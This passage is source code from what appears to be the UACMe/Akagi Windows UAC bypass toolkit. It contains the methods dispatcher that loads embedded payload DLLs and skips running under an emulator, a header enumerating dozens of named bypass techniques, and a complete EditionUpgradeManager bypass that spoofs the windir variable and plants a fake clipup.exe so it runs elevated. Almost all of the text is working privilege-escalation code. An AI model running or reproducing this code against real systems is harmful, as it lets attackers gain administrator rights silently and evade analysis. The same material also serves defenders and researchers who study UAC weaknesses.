NT_WIN7_RTM, MAXDWORD}, AKATSUKI_ID, FALSE, TRUE, TRUE },\n    { MethodIscsiCpl, { NT_WIN7_RTM, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE },\n    { MethodAtlHijack, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n    { MethodSspiDatagram, { NT_WIN7_RTM, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE },\n    { MethodTokenModUIAccess, { NT_WIN10_19H1, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n    { MethodRequestTrace, { NT_WIN11_24H2, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n    { MethodQuickAssist, { NT_WIN10_REDSTONE5, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }\n};\n\n/*\n* IsMethodImplementedForWin32\n*\n* Purpose:\n*\n* Check if method implemented in win32 version.\n*\n*/\n__forceinline BOOL IsMethodImplementedForWin32(\n    _In_ UCM_METHOD Method)\n{\n    UINT i;\n    for (i = 0; i < RTL_NUMBER_OF(UCM_WIN32_NOT_IMPLEMENTED); i++)\n        if (UCM_WIN32_NOT_IMPLEMENTED[i] == (ULONG)Method)\n        
    return FALSE;\n    return TRUE;\n}\n\n/*\n* IsMethodMatchRequirements\n*\n* Purpose:\n*\n* Check system requirements of the given method.\n*\n*/\nNTSTATUS IsMethodMatchRequirements(\n    _In_ PUCM_API_DISPATCH_ENTRY Entry\n)\n{\n#ifdef _DEBUG\n    UNREFERENCED_PARAMETER(Entry);\n#else\n    //\n    //  Check Wow64 flags first. Disable this check for debugging build.\n    //\n    if (g_ctx->IsWow64) {\n        if (Entry->DisallowWow64) {\n            return STATUS_NOT_SUPPORTED;\n        }\n    }\n#ifdef _WIN64\n    else {\n        //\n        // Not required if Win32.\n        //\n        if (Entry->Win32OrWow64Required != FALSE) {\n            return STATUS_NOT_SUPPORTED;\n        }\n    }\n#endif //_WIN64\n\n    //\n    //  Check availability. Disable this check for debugging build.\n    //\n    if (g_ctx->dwBuildNumber < Entry->Availability.MinumumWindowsBuildRequired) {\n        return STATUS_NOT_SUPPORTED;\n    }\n    if (g_ctx->dwBuildNumber >= Entry->Availability.MinimumExpectedFixedWindowsBuild) {\n        return STATUS_NOT_SUPPORTED;\n    }\n#endif\n    return STATUS_SUCCESS;\n}\n\n/*\n* PostCleanupAttempt\n*\n* Purpose:\n*\n* Attempt to cleanup left overs.\n*\n*/\nVOID PostCleanupAttempt(\n    _In_ UCM_METHOD Method\n)\n{\n    switch (Method) {\n\n    case UacMethodDISM:\n    case UacMethodJunction:\n        ucmDismMethodCleanup();\n        break;\n\n    case UacMethodWow64Logger:\n    case UacMethodVFServerDiagProf:\n        ucmMethodCleanupSingleItemSystem32(WOW64LOG_DLL, NULL);\n        break;\n\n    case UacMethodSXSConsent:\n        ucmSXSMethodCleanup();\n        break;\n\n    case UacMethodSXSDccw:\n        ucmSXSDccwMethodCleanup();\n        break;\n\n    case UacMethodHakril:\n        ucmHakrilMethodCleanup();\n        break;\n\n    case UacMethodIscsiCpl:\n        ucmIscsiCplMethodCleanup();\n        break;\n\n    case UacMethodAtlHijack:\n        ucmMethodCleanupSingleItemSystem32(ATL_DLL, WBEM_DIR);\n        break;\n\n    default:\n        
break;\n\n    }\n\n    ucmConsolePrintValueUlong(TEXT(\"[+] PostCleanupAttempt for method\"), (ULONG)Method, FALSE);\n}\n\n/*\n* MethodsManagerCall\n*\n* Purpose:\n*\n* Run method by method id.\n*\n*/\nNTSTATUS MethodsManagerCall(\n    _In_ UCM_METHOD Method\n)\n{\n    BOOL        bParametersBlockSet = FALSE;\n    NTSTATUS    MethodResult, Status;\n    ULONG       PayloadSize = 0, DataSize = 0;\n    PVOID       PayloadCode = NULL, Resource = NULL;\n    PVOID       ImageBaseAddress = g_hInstance;\n\n    PUCM_API_DISPATCH_ENTRY Entry;\n\n    UCM_PARAMS_BLOCK ParamsBlock;\n\n    if (wdIsEmulatorPresent3()) {\n        return STATUS_NOT_SUPPORTED;\n    }\n\n    if (Method >= UacMethodMax) {\n        return STATUS_INVALID_PARAMETER;\n    }\n\n    //\n    // Is method implemented for Win32?\n    //\n#ifndef _WIN64\n    if (!IsMethodImplementedForWin32(Method)) {\n        return STATUS_NOT_SUPPORTED;\n    }\n#endif //_WIN64\n\n#pragma warning(push)\n#pragma warning(disable:33010) //BS disable.\n    Entry = &ucmMethodsDispatchTable[Method];\n#pragma warning(pop)\n\n    Status = IsMethodMatchRequirements(Entry);\n    if (!NT_SUCCESS(Status))\n        return Status;\n\n    ucmConsolePrintValueUlong(TEXT(\"[+] MethodsManagerCall->Method\"), Method, FALSE);\n    ucmConsolePrintValueUlong(TEXT(\"[+] MethodsManagerCall->Entry->PayloadResourceId\"), Entry->PayloadResourceId, TRUE);\n\n    if (Entry->PayloadResourceId != PAYLOAD_ID_NONE) {\n\n        Status = supLdrQueryResourceDataEx(\n            Entry->PayloadResourceId,\n            ImageBaseAddress,\n            &DataSize,\n            &Resource);\n\n        if (!NT_SUCCESS(Status)) {\n\n            if (Status == STATUS_RESOURCE_TYPE_NOT_FOUND)\n                return STATUS_INVALID_IMAGE_FORMAT;\n\n            return Status;\n        }\n\n        if (DataSize == 0 || Resource == NULL) {\n            return STATUS_INVALID_IMAGE_FORMAT;\n        }\n\n        PayloadCode = g_ctx->DecompressRoutine(Entry->PayloadResourceId, 
Resource, DataSize, &PayloadSize);\n\n        if ((PayloadCode == NULL) || (PayloadSize == 0)) {\n            return STATUS_DATA_ERROR;\n        }\n    }\n\n    ParamsBlock.Method = Method;\n    ParamsBlock.PayloadCode = PayloadCode;\n    ParamsBlock.PayloadSize = PayloadSize;\n\n    ucmConsolePrintValueUlong(TEXT(\"[+] MethodsManagerCall->Entry->SetParameters\"), Entry->SetParameters, FALSE);\n\n    //\n    // Set shared parameters.\n    //\n    //   1. Execution parameters (flag, session id, winstation\\desktop)\n    //   2. Optional parameter from Akagi command line.\n    //\n    if (Entry->SetParameters) {\n        bParametersBlockSet = supCreateSharedParametersBlock(g_ctx);\n        ucmConsolePrintValueUlong(TEXT(\"[+] MethodsManagerCall->bParametersBlockSet\"), bParametersBlockSet, FALSE);\n    }\n\n    MethodResult = Entry->Routine(&ParamsBlock);\n\n    if (PayloadCode) {\n        RtlSecureZeroMemory(PayloadCode, PayloadSize);\n        supVirtualFree(PayloadCode, NULL);\n    }\n\n    //\n    // Wait a little bit for completion.\n    //\n    if (Entry->SetParameters && bParametersBlockSet) {\n        Status = supWaitForGlobalCompletionEvent();\n        ucmConsolePrintStatus(TEXT(\"[+] MethodsManagerCall->supWaitForGlobalCompletionEvent\"), Status);\n        supDestroySharedParametersBlock(g_ctx);\n    }\n\n    //\n    // Perform method-specific cleanup\n    //\n    PostCleanupAttempt(Method);\n\n    return MethodResult;\n}\n\n/************************************************************\n**\n**\n**\n** Method table wrappers\n**\n**\n**\n************************************************************/\n\nUCM_API(MethodDeprecated)\n{\n    UNREFERENCED_PARAMETER(Parameter);\n    return STATUS_NOT_SUPPORTED;\n}\n\nUCM_API(MethodTest)\n{\n#ifdef _DEBUG\n    return ucmTestRoutine(Parameter->PayloadCode, Parameter->PayloadSize);\n#else\n    UNREFERENCED_PARAMETER(Parameter);\n    return TRUE;\n#endif\n}\n\nUCM_API(MethodSXS)\n{\n    return ucmSXSMethod(\n        
Parameter->PayloadCode,\n        Parameter->PayloadSize,\n        NULL,\n        CONSENT_EXE,\n        MSCONFIG_EXE,\n        TRUE);\n}\n\nUCM_API(MethodDism)\n{\n    return ucmDismMethod(\n        Parameter->PayloadCode,\n        Parameter->PayloadSize);\n}\n\nUCM_API(MethodWow64Logger)\n{\n    //\n    //  Required x64 as this method abuse wow64 logger mechanism\n    //\n#ifdef _WIN64\n    return ucmWow64LoggerMethod(\n        Parameter->PayloadCode,\n        Parameter->PayloadSize);\n#else\n    UNREFERENCED_PARAMETER(Parameter);\n    return STATUS_NOT_SUPPORTED;\n#endif\n}\n\nUCM_API(MethodUiAccess)\n{\n    return ucmUiAccessMethod(\n        Parameter->PayloadCode,\n        Parameter->PayloadSize);\n}\n\nUCM_API(MethodMsSettings)\n{\n    LPWSTR lpszPayload = NULL;\n    LPWSTR lpszTargetApp = NULL;\n\n    WCHAR szTargetApp[MAX_PATH * 2];\n\n    if (g_ctx->OptionalParameterLength == 0)\n        lpszPayload = g_ctx->szDefaultPayload;\n    else\n        lpszPayload = g_ctx->szOptionalParameter;\n\n    if (Parameter->Method == UacMethodMsSettings2)\n        lpszTargetApp = COMPUTERDEFAULTS_EXE;\n    else\n        lpszTargetApp = FODHELPER_EXE;\n\n    _strcpy(szTargetApp, g_ctx->szSystemDirectory);\n    _strcat(szTargetApp, lpszTargetApp);\n\n    return ucmShellRegModMethod(Parameter->Method,\n        T_MSSETTINGS,\n        szTargetApp,\n        lpszPayload);\n}\n\nUCM_API(MethodTyranid)\n{\n    LPWSTR lpszPayload = NULL;\n\n    UNREFERENCED_PARAMETER(Parameter);\n\n    //\n    // Select target application or use given by optional parameter.\n    //\n    if (g_ctx->OptionalParameterLength == 0)\n        lpszPayload = g_ctx->szDefaultPayload;\n    else\n        lpszPayload = g_ctx->szOptionalParameter;\n\n    return ucmDiskCleanupEnvironmentVariable(lpszPayload);\n}\n\nUCM_API(MethodJunction)\n{\n    return ucmJunctionMethod(\n        Parameter->PayloadCode,\n        Parameter->PayloadSize);\n}\n\nUCM_API(MethodSXSDccw)\n{\n    return ucmSXSDccwMethod(\n        
Parameter->PayloadCode,\n        Parameter->PayloadSize);\n}\n\nUCM_API(MethodHakril)\n{\n    return ucmHakrilMethod(\n        Parameter->PayloadCode,\n        Parameter->PayloadSize);\n}\n\nUCM_API(MethodCorProfiler)\n{\n    return ucmCorProfilerMethod(\n        Parameter->PayloadCode,\n        Parameter->PayloadSize);\n}\n\nUCM_API(MethodCMLuaUtil)\n{\n    LPWSTR lpszParameter;\n\n    UNREFERENCED_PARAMETER(Parameter);\n\n    //\n    // Select target application or use given by optional parameter.\n    //\n    if (g_ctx->OptionalParameterLength == 0)\n        lpszParameter = g_ctx->szDefaultPayload;\n    else\n        lpszParameter = g_ctx->szOptionalParameter;\n\n    return ucmCMLuaUtilShellExecMethod(lpszParameter);\n}\n\nUCM_API(MethodDccwCOM)\n{\n    LPWSTR lpszPayload = NULL;\n\n    UNREFERENCED_PARAMETER(Parameter);\n\n    //\n    // Select target application or use given by optional parameter.\n    //\n    if (g_ctx->OptionalParameterLength == 0)\n        lpszPayload = g_ctx->szDefaultPayload;\n    else\n        lpszPayload = g_ctx->szOptionalParameter;\n\n    return ucmDccwCOMMethod(lpszPayload);\n}\n\nUCM_API(MethodDirectoryMock)\n{\n    return ucmDirectoryMockMethod(\n        Parameter->PayloadCode,\n        Parameter->PayloadSize);\n}\n\nUCM_API(MethodShellSdctl)\n{\n    LPWSTR Payload = NULL;\n\n    if (g_ctx->OptionalParameterLength == 0)\n        Payload = g_ctx->szDefaultPayload;\n    else\n        Payload = g_ctx->szOptionalParameter;\n\n    return ucmShellRegModMethod(Parameter->Method,\n        T_CLASSESFOLDER,\n        SDCLT_EXE,\n        Payload);\n}\n\nUCM_API(MethodTokenModUIAccess)\n{\n    if (Parameter->Method == UacMethodTokenModUiAccess) {\n        return ucmTokenModUIAccessMethod(Parameter->PayloadCode,\n            Parameter->PayloadSize);\n    }\n    else {\n        return ucmTokenModUIAccessMethod2(Parameter->PayloadCode,\n            Parameter->PayloadSize);\n    }\n}\n\nUCM_API(MethodEditionUpgradeManager)\n{\n#ifndef _WIN64\n    
UNREFERENCED_PARAMETER(Parameter);\n    return STATUS_NOT_SUPPORTED;\n#else\n    return ucmEditionUpgradeManagerMethod(\n        Parameter->PayloadCode,\n        Parameter->PayloadSize);\n#endif\n}\n\nUCM_API(MethodDebugObject)\n{\n    LPWSTR lpszPayload = NULL;\n    UNREFERENCED_PARAMETER(Parameter);\n\n    //\n    // Select target application or use given by optional parameter.\n    //\n    if (g_ctx->OptionalParameterLength == 0)\n        lpszPayload = g_ctx->szDefaultPayload;\n    else\n        lpszPayload = g_ctx->szOptionalParameter;\n\n    return ucmDebugObjectMethod(lpszPayload);\n}\n\nUCM_API(MethodShellChangePk)\n{\n    LPWSTR lpszPayload = NULL;\n\n    //\n    // Select target application or use given by optional parameter.\n    //\n    if (g_ctx->OptionalParameterLength == 0)\n        lpszPayload = g_ctx->szDefaultPayload;\n    else\n        lpszPayload = g_ctx->szOptionalParameter;\n\n    return ucmShellRegModMethod(Parameter->Method,\n        T_LAUNCHERSYSTEMSETTINGS,\n        SLUI_EXE,\n        lpszPayload);\n}\n\nUCM_API(MethodNICPoison)\n{\n#ifndef _WIN64\n    UNREFERENCED_PARAMETER(Parameter);\n    return STATUS_NOT_SUPPORTED;\n#else\n    if (Parameter->Method == UacMethodNICPoison) {\n\n        return ucmNICPoisonMethod(\n            Parameter->PayloadCode,\n            Parameter->PayloadSize);\n\n    }\n    else if (Parameter->Method == UacMethodNICPoison2) {\n\n        return ucmNICPoisonMethod2(\n            Parameter->PayloadCode,\n            Parameter->PayloadSize);\n\n    }\n    else \n        return STATUS_NOT_SUPPORTED;\n#endif\n}\n\nUCM_API(MethodIeAddOnInstall)\n{\n#ifdef _WIN64\n    return ucmIeAddOnInstallMethod(\n        Parameter->PayloadCode,\n        Parameter->PayloadSize);\n#else\n    UNREFERENCED_PARAMETER(Parameter);\n    return STATUS_NOT_SUPPORTED;\n#endif\n}\n\nUCM_API(MethodWscActionProtocol)\n{\n    LPWSTR lpszPayload = NULL;\n\n    UNREFERENCED_PARAMETER(Parameter);\n\n    //\n    // Select target application or use 
given by optional parameter.\n    //\n    if (g_ctx->OptionalParameterLength == 0)\n        lpszPayload = g_ctx->szDefaultPayload;\n    else\n        lpszPayload = g_ctx->szOptionalParameter;\n\n    return ucmWscActionProtocolMethod(lpszPayload);\n}\n\nUCM_API(MethodFwCplLua2)\n{\n    LPWSTR lpszPayload = NULL;\n\n    UNREFERENCED_PARAMETER(Parameter);\n\n    //\n    // Select target application or use given by optional parameter.\n    //\n    if (g_ctx->OptionalParameterLength == 0)\n        lpszPayload = g_ctx->szDefaultPayload;\n    else\n        lpszPayload = g_ctx->szOptionalParameter;\n\n    return ucmFwCplLuaMethod2(lpszPayload);\n}\n\nUCM_API(MethodProtocolHijack)\n{\n    NTSTATUS Result = STATUS_ACCESS_DENIED;\n    LPWSTR PayloadParameter = NULL, PayloadFinal = NULL;\n    SIZE_T Size;\n\n    //\n    // Select target application or use given by optional parameter.\n    //\n    if (g_ctx->OptionalParameterLength == 0)\n        PayloadParameter = g_ctx->szDefaultPayload;\n    else\n        PayloadParameter = g_ctx->szOptionalParameter;\n\n    switch (Parameter->Method) {\n    \n    case UacMethodMsSettingsProtocol:\n        Result = ucmMsSettingsProtocolMethod(PayloadParameter);\n        break;\n    \n    case UacMethodMsStoreProtocol:\n\n        Size = ((MAX_PATH * 2) + _strlen(PayloadParameter)) * sizeof(WCHAR);\n        PayloadFinal = supHeapAlloc(Size);\n        if (PayloadFinal) {\n\n            _strcpy(PayloadFinal, g_ctx->szSystemDirectory);\n            _strcat(PayloadFinal, CMD_EXE);\n            _strcat(PayloadFinal, RUN_CMD_COMMAND);\n            _strcat(PayloadFinal, PayloadParameter);\n            Result = ucmMsStoreProtocolMethod(PayloadFinal);\n            supHeapFree(PayloadFinal);\n        }\n        break;\n\n    }\n\n    return Result;\n}\n\nUCM_API(MethodPca)\n{\n#ifndef _WIN64\n    UNREFERENCED_PARAMETER(Parameter);\n    return STATUS_NOT_SUPPORTED;\n#else\n    return ucmPcaMethod(\n        Parameter->PayloadCode,\n        
Parameter->PayloadSize);\n#endif\n}\n\nUCM_API(MethodCurVer)\n{\n    UNREFERENCED_PARAMETER(Parameter);\n#ifndef _WIN64\n    return STATUS_NOT_SUPPORTED;\n#else\n    LPWSTR lpszPayload = NULL;\n    LPWSTR lpszTargetApp = NULL;\n\n    WCHAR szTargetApp[MAX_PATH * 2];\n\n    if (g_ctx->OptionalParameterLength == 0)\n        lpszPayload = g_ctx->szDefaultPayload;\n    else\n        lpszPayload = g_ctx->szOptionalParameter;\n\n    lpszTargetApp = FODHELPER_EXE;\n    _strcpy(szTargetApp, g_ctx->szSystemDirectory);\n    _strcat(szTargetApp, lpszTargetApp);\n\n    return ucmShellRegModMethod3(T_MSSETTINGS,\n        szTargetApp,\n        lpszPayload);\n\n#endif\n}\n\nUCM_API(MethodMsdt)\n{\n    return ucmMsdtMethod(\n        Parameter->PayloadCode,\n        Parameter->PayloadSize);\n}\n\nUCM_API(MethodDotNetSerial)\n{\n    LPWSTR lpszPayload = NULL;\n\n    UNREFERENCED_PARAMETER(Parameter);\n\n    if (g_ctx->OptionalParameterLength == 0)\n        lpszPayload = g_ctx->szDefaultPayload;\n    else\n        lpszPayload = g_ctx->szOptionalParameter;\n\n    return ucmDotNetSerialMethod(lpszPayload);\n}\n\nUCM_API(MethodVFServerTaskSched)\n{\n    return ucmVFServerTaskSchedMethod(\n        Parameter->PayloadCode,\n        Parameter->PayloadSize);\n}\n\nUCM_API(MethodVFServerDiagProf)\n{\n    return ucmVFServerDiagProfileMethod(\n        Parameter->PayloadCode,\n        Parameter->PayloadSize);\n}\n\nUCM_API(MethodIscsiCpl)\n{\n    return ucmIscsiCplMethod(\n        Parameter->PayloadCode,\n        Parameter->PayloadSize);\n}\n\nUCM_API(MethodAtlHijack)\n{\n#ifdef _WIN64\n    return ucmAtlHijackMethod(MMC_EXE,\n        ATL_DLL,\n        Parameter->PayloadCode,\n        Parameter->PayloadSize);\n#else\n    UNREFERENCED_PARAMETER(Parameter);\n    return STATUS_NOT_SUPPORTED;\n#endif\n}\n\nUCM_API(MethodSspiDatagram)\n{\n#ifdef _WIN64\n    return ucmSspiDatagramMethod(\n        Parameter->PayloadCode,\n        Parameter->PayloadSize);\n#else\n    UNREFERENCED_PARAMETER(Parameter);\n  
  return STATUS_NOT_SUPPORTED;\n#endif\n}\n\nUCM_API(MethodRequestTrace)\n{\n#ifdef _WIN64\n    return ucmRequestTraceMethod(\n        Parameter->PayloadCode,\n        Parameter->PayloadSize);\n#else\n    UNREFERENCED_PARAMETER(Parameter);\n    return STATUS_NOT_SUPPORTED;\n#endif\n}\n\nUCM_API(MethodQuickAssist)\n{\n#ifdef _WIN64\n    return ucmQuickAssistMethod(\n        Parameter->PayloadCode,\n        Parameter->PayloadSize);\n#else\n    UNREFERENCED_PARAMETER(Parameter);\n    return STATUS_NOT_SUPPORTED;\n#endif\n}\n"
  },
  {
    "path": "Source/Akagi/methods/methods.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2025\n*\n*  TITLE:       METHODS.H\n*\n*  VERSION:     3.68\n*\n*  DATE:        07 Mar 2025\n*\n*  Prototypes and definitions for UAC bypass methods table.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\ntypedef enum _UCM_METHOD {\n    UacMethodTest = 0,          //+\n    UacMethodSysprep1 = 1,      \n    UacMethodSysprep2,          \n    UacMethodOobe,              \n    UacMethodRedirectExe,       \n    UacMethodSimda,             \n    UacMethodCarberp1,          \n    UacMethodCarberp2,          \n    UacMethodTilon,             \n    UacMethodAVrf,              \n    UacMethodWinsat,            \n    UacMethodShimPatch,         \n    UacMethodSysprep3,          \n    UacMethodMMC1,              \n    UacMethodSirefef,           \n    UacMethodGeneric,           \n    UacMethodGWX,               \n    UacMethodSysprep4,          \n    UacMethodManifest,          \n    UacMethodInetMgr,           \n    UacMethodMMC2,              \n    UacMethodSXS,               \n    UacMethodSXSConsent,        //+\n    UacMethodDISM,              //+\n    UacMethodComet,             \n    UacMethodEnigma0x3,         \n    UacMethodEnigma0x3_2,       \n    UacMethodExpLife,           \n    UacMethodSandworm,          \n    UacMethodEnigma0x3_3,       \n    UacMethodWow64Logger,       //+\n    UacMethodEnigma0x3_4,       \n    UacMethodUiAccess,          //+\n    UacMethodMsSettings,        //+\n    UacMethodDiskSilentCleanup, //+\n    UacMethodTokenMod,          \n    UacMethodJunction,          //+\n    UacMethodSXSDccw,           //+\n    UacMethodHakril,       
     //+\n    UacMethodCorProfiler,       //+\n    UacMethodCOMHandlers,       \n    UacMethodCMLuaUtil,         //+\n    UacMethodFwCplLua,          \n    UacMethodDccwCOM,           //+\n    UacMethodVolatileEnv,       \n    UacMethodSluiHijack,        \n    UacMethodBitlockerRC,       \n    UacMethodCOMHandlers2,      \n    UacMethodSPPLUAObject,      \n    UacMethodCreateNewLink,     \n    UacMethodDateTimeWriter,    \n    UacMethodAcCplAdmin,        \n    UacMethodDirectoryMock,     //+\n    UacMethodShellSdclt,        //+\n    UacMethodEgre55,            \n    UacMethodTokenModUiAccess,  //+\n    UacMethodShellWSReset,      \n    UacMethodSysprep5,          \n    UacMethodEditionUpgradeMgr, //+\n    UacMethodDebugObject,       //+\n    UacMethodGlupteba,          \n    UacMethodShellChangePk,     //+\n    UacMethodMsSettings2,       //+\n    UacMethodNICPoison,         //+\n    UacMethodIeAddOnInstall,    //+\n    UacMethodWscActionProtocol, //+\n    UacMethodFwCplLua2,         //+\n    UacMethodMsSettingsProtocol,//+\n    UacMethodMsStoreProtocol,   //+\n    UacMethodPca,               //+\n    UacMethodCurVer,            //+\n    UacMethodNICPoison2,        //+\n    UacMethodMsdt,              //+\n    UacMethodDotNetSerial,      //+\n    UacMethodVFServerTaskSched, //+\n    UacMethodVFServerDiagProf,  //+\n    UacMethodIscsiCpl,          //+\n    UacMethodAtlHijack,         //+\n    UacMethodSspiDatagram,      //+\n    UacMethodTokenModUiAccess2, //+\n    UacMethodRequestTrace,      //+\n    UacMethodQuickAssist,       //+\n    UacMethodMax,\n    UacMethodInvalid = 0xabcdef\n} UCM_METHOD;\n\n#define UCM_DISPATCH_ENTRY_MAX UacMethodMax\n\ntypedef struct _UCM_METHOD_AVAILABILITY {\n    ULONG MinumumWindowsBuildRequired;             //if the current build is less than this value, this method does not work here\n    ULONG MinimumExpectedFixedWindowsBuild;        //if the current build is equal to or greater than this value, this method does not work here or is fixed\n} 
UCM_METHOD_AVAILABILITY;\n\ntypedef struct tagUCM_PARAMS_BLOCK {\n    UCM_METHOD Method;\n    PVOID PayloadCode;\n    ULONG PayloadSize;\n} UCM_PARAMS_BLOCK, *PUCM_PARAMS_BLOCK;\n\ntypedef NTSTATUS(CALLBACK *PUCM_API_ROUTINE)(\n    _In_ PUCM_PARAMS_BLOCK Parameter\n    );\n                  \n#define UCM_API(n) NTSTATUS CALLBACK n(     \\\n    _In_ PUCM_PARAMS_BLOCK Parameter)  \n\ntypedef struct _UCM_API_DISPATCH_ENTRY {\n    PUCM_API_ROUTINE Routine;               //method to execute\n    UCM_METHOD_AVAILABILITY Availability;   //min and max supported Windows builds\n    ULONG PayloadResourceId;                //which payload dll must be used\n    BOOL Win32OrWow64Required;\n    BOOL DisallowWow64;\n    BOOL SetParameters;                     //need shared parameters to be set\n} UCM_API_DISPATCH_ENTRY, *PUCM_API_DISPATCH_ENTRY;\n\n#include \"elvint.h\"\n#include \"routines.h\"\n#include \"comsup.h\"\n#include \"tests\\test.h\"\n\nNTSTATUS MethodsManagerCall(\n    _In_ UCM_METHOD Method);\n"
  },
  {
    "path": "Source/Akagi/methods/rinn.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2018 - 2025\n*\n*  TITLE:       RINN.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        07 Jul 2025\n*\n*  FBK UAC bypass methods.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\n/*\n* ucmEditionUpgradeManagerMethod\n*\n* Purpose:\n*\n* Bypass UAC using EditionUpgradeManager autoelevated interface.\n* This function expects that supMasqueradeProcess was called on process initialization.\n*\n* EditionUpgradeManager has a method called AcquireModernLicenseWithPreviousId.\n* During its execution MS code starts the Clipup.exe process from (what it supposes to be) the Windows system32 folder.\n* However, since MS programmers are always lazy and banned in their own documentation, it uses the\n* environment variable \"windir\" to expand the Windows directory instead of using something like GetSystemDirectory.\n* This gives us the opportunity (hello Nadela) to spoof the current user environment variable for the requested DllHost.exe,\n* thus making their code launch our clipup.exe from our controlled location.\n*\n*/\nNTSTATUS ucmEditionUpgradeManagerMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n    BOOL bEnvSet = FALSE;\n    HRESULT hr_init;\n    IEditionUpgradeManager *Manager = NULL;\n\n    DWORD Data[3];\n\n    LPOLESTR lpGuidDir = NULL;\n    LPWSTR lpPath = NULL;\n    LPWSTR stringPtr = NULL;\n\n    SIZE_T nLen;\n\n    GUID guidTemp;\n\n    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n\n    do {\n\n        if (CoCreateGuid(&guidTemp) != S_OK)\n            break;\n\n        if (StringFromCLSID(&guidTemp, 
&lpGuidDir) != S_OK)\n            break;\n\n        nLen = (1 + _strlen(lpGuidDir) + (MAX_PATH * 2)) * sizeof(WCHAR);\n        lpPath = (LPWSTR)supHeapAlloc(nLen);\n        if (lpPath == NULL)\n            break;\n\n        //\n        // Replace default Fubuki dll entry point with new and remove dll flag.\n        //\n        if (!supReplaceDllEntryPoint(\n            ProxyDll,\n            ProxyDllSize,\n            FUBUKI_DEFAULT_ENTRYPOINT,\n            TRUE))\n        {\n            break;\n        }\n\n        //\n        // Create %temp%\\{GUID} directory.\n        //\n        \n        _strcpy(lpPath, g_ctx->szTempDirectory);\n        stringPtr = _strcat(lpPath, lpGuidDir);\n\n        if (!CreateDirectory(lpPath, NULL))\n            if (GetLastError() != ERROR_ALREADY_EXISTS)\n                break;\n\n        //\n        // Set controlled environment variable.\n        //\n        bEnvSet = supSetEnvVariable(FALSE,\n            NULL,\n            T_WINDIR,\n            lpPath);\n\n        if (!bEnvSet)\n            break;\n\n        //\n        // Create %temp%\\{GUID}\\system32 directory.\n        //\n        _strcat(lpPath, SYSTEM32_DIR);\n        if (!CreateDirectory(lpPath, NULL))\n            if (GetLastError() != ERROR_ALREADY_EXISTS)\n                break;\n\n        //\n        // Drop payload to %temp%\\system32 as clipup.exe and run target interface.\n        //\n        _strcat(lpPath, CLIPUP_EXE);\n        if (supWriteBufferToFile(lpPath, ProxyDll, ProxyDllSize)) {\n\n            if (FAILED(ucmAllocateElevatedObject(T_CLSID_EditionUpgradeManager,\n                &IID_EditionUpgradeManager,\n                CLSCTX_LOCAL_SERVER,\n                &Manager)))\n            {\n                break;\n            }\n\n            if (Manager == NULL) {\n                break;\n            }\n\n            Data[0] = 'f';\n            Data[1] = 'f';\n            Data[2] = 0;\n\n            Manager->lpVtbl->AcquireModernLicenseWithPreviousId(Manager,\n 
               MYSTERIOUSCUTETHING, (PDWORD)&Data);\n\n            MethodResult = STATUS_SUCCESS;\n        }\n\n    } while (FALSE);\n\n    if (Manager)\n        Manager->lpVtbl->Release(Manager);\n\n    //\n    // Cleanup section.\n    //\n    //  1. Remove variable.\n    //  2. Remove payload file.\n    //  3. Remove fake directories.\n    //\n    if (bEnvSet)\n        supSetEnvVariable(TRUE, NULL, T_WINDIR, NULL);\n\n    CoTaskMemFree(lpGuidDir);\n\n    supWaitForGlobalCompletionEvent();\n\n    if (lpPath) {\n        if (stringPtr) {\n            DeleteFile(lpPath);\n\n            *stringPtr = 0;\n            _strcat(lpPath, SYSTEM32_DIR);\n            RemoveDirectory(lpPath);\n\n            *stringPtr = 0;\n            RemoveDirectory(lpPath);\n        }\n\n        supHeapFree(lpPath);\n    }\n\n    if (SUCCEEDED(hr_init))\n        CoUninitialize();\n\n    return MethodResult;\n}\n"
  },
  {
    "path": "Source/Akagi/methods/routines.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2014 - 2025\n*\n*  TITLE:       ROUTINES.H\n*\n*  VERSION:     3.68\n*\n*  DATE:        07 Mar 2025\n*\n*  Prototypes of methods for UAC bypass methods table.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\nNTSTATUS ucmGenericAutoelevationEx(\n    _In_opt_ LPCWSTR lpTargetApp,\n    _In_ LPCWSTR lpTargetDll,\n    _In_opt_ LPCWSTR lpParameters,\n    _In_opt_ LPCWSTR lpSubDirectory,\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmGenericAutoelevation(\n    _In_opt_ LPCWSTR lpTargetApp,\n    _In_ LPCWSTR lpTargetDll,\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize);\n\nNTSTATUS ucmShellRegModMethod(\n    _In_ UCM_METHOD Method,\n    LPCWSTR lpTargetKey,\n    LPCWSTR 